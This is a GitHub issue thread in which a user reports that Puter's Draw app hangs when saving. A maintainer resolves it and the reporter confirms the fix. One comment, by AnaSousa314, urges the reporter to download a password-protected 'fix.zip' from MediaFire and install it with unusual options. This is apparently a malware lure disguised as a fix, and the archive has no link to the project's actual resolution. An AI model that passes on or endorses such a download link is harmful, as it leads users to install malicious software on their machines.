### ISSUE TITLE
Draw App can't save 

### ISSUE THREAD

**Issue by tioannidis** [HeyPuter/puter#720]
**Issue Description**
When trying to save a drawing to Desktop or Pictures folder, a rotating circle appears all the time. The app no longer responds.
relogin doesn't help

**Steps to Reproduce**
open draw
doodle something
try to save 

**Expected & Actual Behavior**

**Addition Information or Screenshots (if applicable)**
![image](https://github.com/user-attachments/assets/13dbb92d-4c54-4fb1-a2c1-c60d898bb750)

**Deployment**
- [x ] Production (puter.com)
- [ ] Development (`npm run start`)
- [ ] Docker (via `docker run`)
- [ ] Docker (via `docker-compose`)

**Puter version (if accessible)**
Version: 2.4.1 • Server: frankfurt • Deployed: 26/08/2024, 00:27:54

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jelveh** [comment]
This should be resolved now. Could you try again?

**Comment by tioannidis** [comment]
fix confirmed.
